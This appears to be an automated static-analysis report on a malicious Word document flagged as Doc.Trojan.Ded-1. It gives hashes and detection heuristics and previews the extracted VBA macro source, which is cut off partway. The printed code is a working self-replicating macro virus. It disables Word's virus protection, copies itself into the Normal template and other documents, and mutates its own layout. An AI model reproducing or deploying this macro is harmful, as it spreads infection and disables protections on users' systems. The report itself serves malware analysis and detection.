Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab2b5319c419e5db…

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-08-22 20:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 35f287c899baaaf391d2f155741f802c SHA-1: 3cbc595d6462dd9b8ef16aae614f20dbf9ae24be SHA-256: ab2b5319c419e5db2610cc4b906051fd50617e55f84f36d27010edfdab2d436c
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Word document containing VBA macros. The macros attempt to disable virus protection and inject code into the document, likely to establish persistence or download additional malware. The presence of `Shell()` calls and the ClamAV detection signature 'Doc.Trojan.Ded-1' strongly indicate malicious intent.

Heuristics 3

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21373 bytes
SHA-256: 6345aea0e326ff847428dd8059c49b8017771134a47a8dd8b4c8e092a7e3a859
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
     Private Sub _
Document_New()

        End Sub
'9.637774
          Private _
Sub Document_Close()

           On _
Error GoTo skam

  Options. _
              VirusProtection = False

          SWL
'33.61163
     ABS99
'42.56033
skam:
'8.957314
           End Sub
'72.16117
      Private Sub SWL()
'42.59714
     Application. _
                          ShowVisualBasicEditor = False

              If Not _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

        For _
I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines

    d = NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Lines(I, 1)

 If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

            While Mid(d, _
Len(d) - 1, 2) = " _"

      I _
= I + 1

        d = Left(d, Len(d) _
- 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

              Wend
'95.43525
              d = _
e(d)

            ActiveDocument. _
                            VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

    End If
'90.69127
           Next I
'36.27004
       ActiveDocument. _
                                     SaveAs AddToRecentFiles:=False

   End If
'87.02004
End Sub
'90.91909
              Private Sub _
ABS99()

     If Not NormalTemplate. _
 VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

 f (NormalTemplate. _
            FullName)

   For I = _
1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

              d = ActiveDocument.VBProject. _
VBComponents(1).CodeModule.Lines(I, 1)

        If Len(d) _
> 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

 While _
Mid(d, Len(d) - 1, 2) = " _"

            I = _
I + 1

        d = Left(d, _
Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

       Wend
'95.04152
        d _
= e(d)

  NormalTemplate.VBProject. _
   VBComponents(1).CodeModule.InsertLines I * 2, d

             End If
'29.928
            Next I
'63.33987
 NormalTemplate. _
   Save

         End If
'4.384488
         End Sub
'4.367179
 Private Function _
e(aString) As String

           aString _
= LTrim(aString)

          aString = RTrim(aString)
'62.57433
 If aString = "Sub " & "Vc()" Then
'53.55306
             aString _
= "Sub " & "ViewVBCode()"

       Else
'98.58498
            If aString = "Sub " & "ViewVBCode()" Then
'60.07596
            aString _
= "Sub " & "Vc()"

 End If
'61.56798
   End _
If

       For _
I = 1 To Len(aString) - 1

         If _
Mid(aString, I, 1) = "." Then

              If Not _
Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

      If Not Mid(aString, I + 1, 1) _
= Chr$(34) Then

    e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

 For _
j = 1 To Int(15 * Rnd)

   e = " " & e
'57.74265
       Next j
'78.44582
Exit _
Function

             End If
'30.3376
            End If
'26.83433
              Else
'31.48093
 If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then

If _
Not Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

            e = Left(aString, I - 1) & " _" & _
Chr$(13) & Right(aString, Len(aString) - I)

       For _
j = 1 To Int(15 * Rnd)

             e = " " & e
'10.19003
       Next j
'56.59349
  Exit _
Function

              End _
If

     End _
If

          End _
If

   Next I
'45.99786
       e = _
aString & Chr$(13) & "'" & (100 * Rnd)

    Count
... (truncated)